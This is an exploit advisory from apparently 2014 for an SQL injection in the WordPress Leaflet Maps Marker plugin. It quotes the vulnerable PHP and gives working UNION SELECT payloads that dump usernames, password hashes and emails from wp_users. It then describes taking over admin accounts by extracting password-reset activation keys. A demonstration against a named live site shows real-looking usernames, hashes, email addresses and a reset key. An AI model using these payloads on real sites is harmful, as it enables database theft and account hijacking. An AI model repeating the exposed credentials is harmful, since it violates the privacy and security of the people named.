WordPress leaflet maps marker plugin SQL Injection Vulnerability

2014.05.02

Credit: neo.hapsis

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

########################################
# Exploit Title: WordPress leaflet maps marker plugin SQL Injection Vulnerability #
# Author: neo.hapsis #member og Hackyard Security Group
# E-mail: neo.hapsis[dot]hackyard.net / internet.security[dot]vodafone.it #
# Web Site : neohapsis.com | #
# Category:: webapps #
# Google Dork: NA #
# platform : php #
# Vendor: http://www.mapsmarker.com/ #
# Version: 1.x.x #
# Tested on: linux #
# Security Risk : High #
########################################

1)Introduction
2)Vulnerability Description
3)Exploit

1)Introduction

The WordPress plugin Leaflet Maps Marker allows you to pin, organize & show your favorite places
through OpenStreetMap on your blog and via different APIs on external websites or apps

2)Vulnerability Description

U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from
web user, and make SQL query to the database.
Take for instance when a user login, web page that user name and password and make SQL query to the
database to check if a user has valid name and password.
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change
the SQL query and thus grant us something else.

3)Exploit

[~] P0c [~] :
=================================================================

Vuln file in :

http://Localhost/{Path}/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php

[~] Vuln Code [~] :

-----------------------------------------------------------------------------------------------------------------------------------
elseif (isset($_GET['marker'])) {
$markerid = mysql_real_escape_string($_GET['marker']);
$uid = substr(md5(.rand()), 0, 8);
$pname = pa.$uid;
$table_name_markers = $wpdb->prefix.leafletmapsmarker_markers;

$row = $wpdb->get_row(SELECT id,markername,basemap,layer,lat,lon,icon,popuptext,zoom,
openpopup,mapwidth,mapwidthunit,mapheight,panel,controlbox,overlays_custom,overlays_custom2,
overlays_custom3,overlays_custom4,wms,wms2,wms3,wms4,wms5,wms6,wms7,wms8,wms9,wms10
FROM .$table_name_markers. WHERE id=.$markerid, ARRAY_A);

if(!empty($row)) {

[~] D3m0 [~] :

http://www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=1 [Inj3ct Here]

Code:
Union Select 1,(select(@) from (select (@:=000),(select (@) from (wp_users) where (@) in (@:=concat
(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24,25,26,27,28,29

GREATFULL TRICKY

On extraction user_activation_key by injection that we will use to new password
Now this password is difficult the password of wordpress crack it
Easy way to login into the admin panel
First we going to admin panel and press / Lost your password? \
now we will put the admin user we found by injection and reset the password and get the activation key.
Activation key stored in the sqldatabase in table wp_users on column user_activation_key
Now extract the user_login and user_activation_key
COde:
http://www.site.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1 UNION SELECT 1,2,3,4,
5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,
25,26,27,28,29 FROM wp_users

Now replace to extracted date

http://www.site.com/wp-login.php?action=rp&key=user_activation_key&login=user_login

And set the new password!

Demo on injection

http://brighterdayproject.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1
Union Select 1,(select(@) from (select (@:=000),(select (@) from (wp_users) where (@) in (@:=concat
(@,0x0a,user_login,0x3a,user_pass,0x3a,user_email))))a),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,
21,22,23,24,25,26,27,28,29

View in source page

JayM80:$P$BQGIrXW2vvfVmRZYbvt6IN56MenEAx/:jay@jasonlarche.com

MigerIo3:$P$BvEmL2ZeNTzllduuqR2HkhPmQeQfuX0:pongokongo@gmail.com

Using sqlinjection for extracting date on

http://brighterdayproject.com/wp-content/plugins/leaflet-maps-marker/leaflet-fullscreen.php?marker=-1
UNION SELECT 1,2,3,4,5,group_concat(user_login,0x3a,user_activation_key),7,8,9,10,11,12,13,14,15,16,17,
18,19,20,21,22,23,24,25,26,27,28,29 FROM wp_users

On surce whe can seen
JayM80:EHn9LQ7oZ3dhHUwuf63D

creat the login sintax with activation key when extracted on table_name=users
wp-login.php?action=rp&key=EHn9LQ7oZ3dhHUwuf63D&login=JayM80

By Neo.hapsis !

References:

http://www.mapsmarker.com/

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress leaflet maps marker plugin SQL Injection Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.